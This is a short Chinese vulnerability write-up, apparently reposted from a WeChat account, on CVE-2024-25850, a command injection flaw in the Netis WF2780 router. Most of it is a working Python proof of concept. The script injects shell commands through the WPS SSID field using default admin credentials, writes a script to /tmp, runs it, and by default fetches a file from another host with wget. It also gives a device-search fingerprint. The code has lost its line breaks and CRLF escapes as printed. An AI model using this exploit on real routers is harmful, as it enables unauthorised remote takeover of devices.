免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
Netis WF2780 v2.1.40144版本
https://www.netis-systems.com/Suppory/de_details/id/1/de/189.html03
—
漏洞描述
Netis是一家专门从事网络通信设备的制造商。他们提供各种网络设备,包括路由器、交换机、无线接入点和网络适配器等。Netis WF2780 v2.1.40144版本在bin/cgitest.cgi文件的函数igd_wps_set中有一个远程命令注入漏洞。会导致被远控。
04
—
title='AP setup' && header='netis'
05
—
poc
python poc文件内容如下
#!/usr/bin/env python3import urllib.parseimport socketdef send_cmd(ip, port, cmd):cmd = "";"+cmd+";""#print(f"cmd:{cmd}")body = "wps_set_5g=ap&wps_mode5g=cpin&wps_ap_ssid5g=" + urllib.parse.quote(cmd)request = "POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1rn"request += f"Host: {ip}rn"request += "Content-Length: {}rn".format(len(body))request += "Authorization: Basic YWRtaW46YWRtaW4=rn"request += "Cache-Control: no-cachern"request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36rn"request += "content-type: application/x-www-form-urlencodedrn"request += f"Origin: http://{ip}rn"request += f"Referer: http://{ip}/index.htmrn"request += "Accept-Encoding: gzip, deflatern"request += "Accept-Language: zh-CN,zh;q=0.9rn"request += "Connection: closernrn"request += bodyc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)c.settimeout(8)c.connect((ip,port))c.send(request.encode())c.recv(1024)#print(c.recv(1024))def main(ip, port, cmd):for i in range(len(cmd)):if i == 0:_cmd = f"echo '{cmd[i]}\c' > /tmp/s.sh"else:_cmd = f"echo '{cmd[i]}\c' >> /tmp/s.sh"send_cmd(ip, port, _cmd)send_cmd(ip, port, "chmod 777 /tmp/s.sh")send_cmd(ip, port, "sh /tmp/s.sh")if __name__ == "__main__":main("192.168.1.1", 80, "cd /tmp;wget http://192.168.1.2:8888/a")#main("192.168.1.1", 80, "reboot")
06
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-25850
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论